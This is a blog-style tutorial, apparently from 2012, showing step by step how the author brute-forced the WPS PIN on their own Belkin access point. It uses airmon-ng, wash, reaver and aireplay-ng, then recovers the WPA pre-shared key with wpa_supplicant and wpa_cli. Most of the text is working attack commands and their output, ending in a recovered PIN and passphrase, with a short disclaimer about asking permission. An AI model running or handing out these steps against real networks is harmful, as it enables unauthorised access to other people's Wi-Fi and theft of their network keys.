Wireless Hacking: Hacking WPS enabled AccessPoints

Just when you think you are safe with WPA2 and a PSK over 20 characters long something like this comes along.

It seems that most vendors have WPS enabled as a default setting, so was my Belkin home AP.

In this tutorial i will go through the steps of how i hacked my WPS enabled AccessPoint.

For more information about WPS (Wifi protected Setup) see:

http://en.wikipedia.org/wiki/Wi-Fi_Protected_Setup

Prerequisites:
- A wireless card supporting monitor mode
- Backtrack distribution: (I used Backtrack 5 R2) or
  Reaver WPS from http://code.google.com/p/reaver-wps/

First you need to set your wireless card in monitor mode:
root@bt:~/wlan# airmon-ng start wlan2

To find WPS enabled accesspoints we can use the command "wash" included in Backtrack 5

This command also shows if the WPS is locked, the channel the AP is running on and the BSSID and ESSID of the AP as well as RSSI which is the receive signal strength.

root@bt:~/wlan# wash -i mon0 Wash v1.4 WiFi Protected Setup Scan Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> BSSID Channel RSSI WPS Version WPS Locked ESSID ------------------------------------------------------------------------------------------- XX:XX:XX:XX:XX:XX 6 -30 1.0 No SSID-1

Above we see an AP on Channel 6 with ESSID: SSID-1 that has WPS version 1.0 enabled and RSSI of -30 which means we are close to the AP.

Brute forcing WPS PIN:

open 2 command windows.

In window 1 run:

root@bt:~/wlan# reaver -i mon0 -b XX:XX:XX:XX:XX:XX -c 6 -N -E -A Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner cheffner@tacnetsol.com [+] Waiting for beacon from XX:XX:XX:XX:XX:XX [+] Associated with XX:XX:XX:XX:XX:XX (ESSID: SSID-1) [+] 0.05% complete @ 2012-05-28 23:07:59 (10 seconds/pin) ...big snip...this will take many hours to complete..

Explainations to reaver command-line : -c channel, -A no association, -E Send EAP terminate, -N no acks, -vv very verbose (if you want to see all login attempts)



In window 2 run: root@bt:~/wlan# aireplay-ng -1 5 -a XX:XX:XX:XX:XX:XX mon0 No source MAC (-h) specified. Using the device MAC (00:C0:C4:52:A7:47) 23:01:26  Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel 6 23:01:26  Sending Authentication Request (Open System) [ACK] 23:01:26  Authentication successful 23:01:26  Sending Association Request [ACK] 23:01:26  Association successful :-) (AID: 1)

You might need to test the appropriate timing values depending on how close you are to the AP.

After a long while you should see this in window 1 [+] Associated with XX:XX:XX:XX:XX:XX (ESSID: SSID-1) [+] WPS PIN: '41234568' [+] WPA PSK: 'myverylongpresharedkeyconfiguredintheap' [+] AP SSID: 'SSID-1'

For some reason i do not always get the WPA PSK echoed out like above.
What you can do then is to test the PIN with:

reaver -i mon0 -b XX:XX:XX:XX:XX:XX -c 6 -p <PIN>

After the PIN is discovered and verified. Get WPA-PSK with the below method.

Create a wpa_supplicant.conf including the lines below

ctrl_interface=/var/run/wpa_supplicant ctrl_interface_group=0 update_config=1

Run wpa_supplicant

wpa_supplicant -Dwext -i wlan2 -c ./wpa_supplicant.conf -B
Run wpa_cli

wpa_cli wps_reg <BSSID> <PIN>   # wait for CONNECTED

save_config

Check your saved wpa_supplicant.conf with

cat wpa_supplicant.conf

It should now show you the PSK in clear text.


Hope you find the above useful.

Note:
I wrote this tutorial for reference and in good intentions.
Before you go ahead and hack your neighbours AP ask for permission!
I am not responsible what you do with the above information!
Cheers.

/M